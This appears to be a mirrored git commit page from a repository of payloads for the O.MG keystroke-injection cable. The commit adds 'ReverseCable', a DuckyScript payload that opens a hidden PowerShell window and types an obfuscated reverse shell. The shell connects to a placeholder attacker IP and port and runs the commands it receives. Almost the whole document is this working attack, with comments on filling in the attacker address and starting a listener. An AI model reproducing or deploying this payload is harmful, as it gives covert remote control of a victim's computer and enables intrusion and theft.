mirror of https://github.com/hak5/omg-payloads.git
Uploaded ReverseCable
Reverse shell, based on the ReverseDuckyII script. Plug in your reverse shell <3pull/9/head
parent
9328e12697
commit
33e39faafa
|
@ -0,0 +1,26 @@
|
|||
REM ReverseCable
|
||||
REM Version 1.0
|
||||
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
|
||||
REM Author: 0iphor13
|
||||
|
||||
REM Reverse shell, based on ReverseDuckyII, executed in the background
|
||||
REM Fill in Attacker-IP and Port in Line 19
|
||||
REM DON'T FORGET TO START LISTENER
|
||||
|
||||
DELAY 500
|
||||
DUCKY_LANG de
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI -W hidden
|
||||
DELAY 250
|
||||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("ATTACKER-IP",PORT);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$
|
||||
DELAY 100
|
||||
STRING s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oU
|
||||
DELAY 100
|
||||
STRING t-STriNG);$x=$z+"O.MG@PS "+(pwd)+">";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
|
||||
DELAY 100
|
||||
ENTER
|
Loading…
Reference in New Issue